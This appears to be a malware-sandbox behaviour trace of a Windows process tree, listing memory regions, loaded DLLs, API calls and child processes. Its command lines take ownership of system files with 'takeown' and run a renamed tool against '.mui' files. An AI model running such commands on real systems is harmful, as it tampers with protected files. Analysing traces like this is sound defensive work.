Region: id = 10927 start_va = 0x7f947000 end_va = 0x7f947fff entry_point = 0x0 region_type = private name = "private_0x000000007f947000" filename = "" Region: id = 10928 start_va = 0x7f94c000 end_va = 0x7f94efff entry_point = 0x0 region_type = private name = "private_0x000000007f94c000" filename = "" Region: id = 10929 start_va = 0x7f94f000 end_va = 0x7f94ffff entry_point = 0x0 region_type = private name = "private_0x000000007f94f000" filename = "" Region: id = 10930 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10931 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10932 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 10933 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10934 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 10935 start_va = 0x340000 end_va = 0x340fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 10936 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 10940 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 10941 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10942 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10943 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10944 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10945 start_va = 0x540000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 10946 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10947 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10948 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 10949 start_va = 0x7f820000 end_va = 0x7f91ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f820000" filename = "" Region: id = 10950 start_va = 0x360000 end_va = 0x41dfff entry_point = 0x360000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10951 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10952 start_va = 0x420000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 10953 start_va = 0x460000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10954 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 10955 start_va = 0x7f949000 end_va = 0x7f94bfff entry_point = 0x0 region_type = private name = "private_0x000000007f949000" filename = "" Region: id = 10956 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10957 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10958 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 10959 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10960 start_va = 0x270000 end_va = 0x273fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 10961 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10962 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10963 start_va = 0x4a0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 10964 start_va = 0x280000 end_va = 0x283fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 10965 start_va = 0x7b0000 end_va = 0xae6fff entry_point = 0x7b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 10966 start_va = 0x4a0000 end_va = 0x4a1fff entry_point = 0x4a0000 region_type = mapped_file name = "cacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cacls.exe.mui") Region: id = 10967 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Thread: id = 1032 os_tid = 0x388 Thread: id = 1033 os_tid = 0xa34 Process: id = "161" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x5d54d000" os_pid = "0xdc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "109" os_parent_pid = "0xdfc" cmd_line = "C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"MSPVWCTL.DLL.mui\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10968 start_va = 0x830000 end_va = 0x84ffff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 10969 start_va = 0x850000 end_va = 0x851fff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 10970 start_va = 0x860000 end_va = 0x873fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 10971 start_va = 0x880000 end_va = 0x8bffff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 10972 start_va = 0x8c0000 end_va = 0x9bffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 10973 start_va = 0x9c0000 end_va = 0x9c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 10974 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 10975 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 10976 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10977 start_va = 0x7fab0000 end_va = 0x7fad2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fab0000" filename = "" Region: id = 10978 start_va = 0x7fad8000 end_va = 0x7fadafff entry_point = 0x0 region_type = private name = "private_0x000000007fad8000" filename = "" Region: id = 10979 start_va = 0x7fadb000 end_va = 0x7fadbfff entry_point = 0x0 region_type = private name = "private_0x000000007fadb000" filename = "" Region: id = 10980 start_va = 0x7fadd000 end_va = 0x7faddfff entry_point = 0x0 region_type = private name = "private_0x000000007fadd000" filename = "" Region: id = 10981 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10982 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10983 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 10984 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10985 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 10986 start_va = 0x9d0000 end_va = 0x9d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 10987 start_va = 0x9e0000 end_va = 0x9e1fff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 11008 start_va = 0xad0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 11009 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11010 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11011 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 11012 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 11013 start_va = 0xae0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 11014 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 11015 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 11016 start_va = 0x830000 end_va = 0x83ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 11017 start_va = 0x7f9b0000 end_va = 0x7faaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f9b0000" filename = "" Region: id = 11028 start_va = 0x9f0000 end_va = 0xaadfff entry_point = 0x9f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11029 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 11030 start_va = 0xbe0000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 11031 start_va = 0xc20000 end_va = 0xd1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 11032 start_va = 0xd20000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 11033 start_va = 0x7fad5000 end_va = 0x7fad7fff entry_point = 0x0 region_type = private name = "private_0x000000007fad5000" filename = "" Region: id = 11034 start_va = 0x840000 end_va = 0x843fff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Thread: id = 1034 os_tid = 0xed4 [0301.817] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0301.817] __set_app_type (_Type=0x1) [0301.817] __p__fmode () returned 0x77984d6c [0301.817] __p__commode () returned 0x77985b1c [0301.818] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0301.818] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0301.818] GetCurrentThreadId () returned 0xed4 [0301.818] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xed4) returned 0x84 [0301.818] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0301.818] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0301.818] SetThreadUILanguage (LangId=0x0) returned 0x409 [0301.824] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0301.824] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x9bf8dc | out: phkResult=0x9bf8dc*=0x0) returned 0x2 [0301.825] VirtualQuery (in: lpAddress=0x9bf8e3, lpBuffer=0x9bf894, dwLength=0x1c | out: lpBuffer=0x9bf894*(BaseAddress=0x9bf000, AllocationBase=0x8c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0301.825] VirtualQuery (in: lpAddress=0x8c0000, lpBuffer=0x9bf894, dwLength=0x1c | out: lpBuffer=0x9bf894*(BaseAddress=0x8c0000, AllocationBase=0x8c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0301.825] VirtualQuery (in: lpAddress=0x8c1000, lpBuffer=0x9bf894, dwLength=0x1c | out: lpBuffer=0x9bf894*(BaseAddress=0x8c1000, AllocationBase=0x8c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0301.825] VirtualQuery (in: lpAddress=0x8c3000, lpBuffer=0x9bf894, dwLength=0x1c | out: lpBuffer=0x9bf894*(BaseAddress=0x8c3000, AllocationBase=0x8c0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0301.825] VirtualQuery (in: lpAddress=0x9c0000, lpBuffer=0x9bf894, dwLength=0x1c | out: lpBuffer=0x9bf894*(BaseAddress=0x9c0000, AllocationBase=0x9c0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0301.825] GetConsoleOutputCP () Thread: id = 1036 os_tid = 0xe48 Process: id = "162" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x5bbce000" os_pid = "0xed0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "153" os_parent_pid = "0xcf0" cmd_line = "takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10988 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x170000 region_type = mapped_file name = "takeown.exe" filename = "\\Windows\\SysWOW64\\takeown.exe" (normalized: "c:\\windows\\syswow64\\takeown.exe") Region: id = 10989 start_va = 0xe80000 end_va = 0x4e7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e80000" filename = "" Region: id = 10990 start_va = 0x4e80000 end_va = 0x4e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e80000" filename = "" Region: id = 10991 start_va = 0x4ea0000 end_va = 0x4ea1fff entry_point = 0x0 region_type = private name = "private_0x0000000004ea0000" filename = "" Region: id = 10992 start_va = 0x4eb0000 end_va = 0x4ec3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004eb0000" filename = "" Region: id = 10993 start_va = 0x4ed0000 end_va = 0x4f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ed0000" filename = "" Region: id = 10994 start_va = 0x4f10000 end_va = 0x4f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f10000" filename = "" Region: id = 10995 start_va = 0x4f50000 end_va = 0x4f53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f50000" filename = "" Region: id = 10996 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10997 start_va = 0x7ea10000 end_va = 0x7ea32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea10000" filename = "" Region: id = 10998 start_va = 0x7ea3b000 end_va = 0x7ea3dfff entry_point = 0x0 region_type = private name = "private_0x000000007ea3b000" filename = "" Region: id = 10999 start_va = 0x7ea3e000 end_va = 0x7ea3efff entry_point = 0x0 region_type = private name = "private_0x000000007ea3e000" filename = "" Region: id = 11000 start_va = 0x7ea3f000 end_va = 0x7ea3ffff entry_point = 0x0 region_type = private name = "private_0x000000007ea3f000" filename = "" Region: id = 11001 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11002 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11003 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 11004 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11005 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 11006 start_va = 0x4f60000 end_va = 0x4f60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f60000" filename = "" Region: id = 11007 start_va = 0x4f70000 end_va = 0x4f71fff entry_point = 0x0 region_type = private name = "private_0x0000000004f70000" filename = "" Region: id = 11018 start_va = 0x5160000 end_va = 0x516ffff entry_point = 0x0 region_type = private name = "private_0x0000000005160000" filename = "" Region: id = 11019 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11020 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11021 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 11022 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 11023 start_va = 0x4f80000 end_va = 0x515ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f80000" filename = "" Region: id = 11024 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 11025 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 11026 start_va = 0x4e80000 end_va = 0x4e8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e80000" filename = "" Region: id = 11027 start_va = 0x7e910000 end_va = 0x7ea0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e910000" filename = "" Region: id = 11035 start_va = 0x4f80000 end_va = 0x503dfff entry_point = 0x4f80000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11036 start_va = 0x5060000 end_va = 0x515ffff entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 11037 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 11038 start_va = 0x5170000 end_va = 0x51affff entry_point = 0x0 region_type = private name = "private_0x0000000005170000" filename = "" Region: id = 11039 start_va = 0x51b0000 end_va = 0x51effff entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 11040 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 11041 start_va = 0x7ea38000 end_va = 0x7ea3afff entry_point = 0x0 region_type = private name = "private_0x000000007ea38000" filename = "" Region: id = 11042 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 11043 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 11044 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 11045 start_va = 0x4e90000 end_va = 0x4e93fff entry_point = 0x0 region_type = private name = "private_0x0000000004e90000" filename = "" Region: id = 11046 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 11047 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 11048 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 11049 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 11050 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 11051 start_va = 0x74730000 end_va = 0x74737fff entry_point = 0x74730000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 11052 start_va = 0x51f0000 end_va = 0x53affff entry_point = 0x0 region_type = private name = "private_0x00000000051f0000" filename = "" Region: id = 11053 start_va = 0x51f0000 end_va = 0x5377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000051f0000" filename = "" Region: id = 11054 start_va = 0x53a0000 end_va = 0x53affff entry_point = 0x0 region_type = private name = "private_0x00000000053a0000" filename = "" Region: id = 11055 start_va = 0x53b0000 end_va = 0x53d9fff entry_point = 0x53b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 11056 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 11057 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Thread: id = 1035 os_tid = 0x190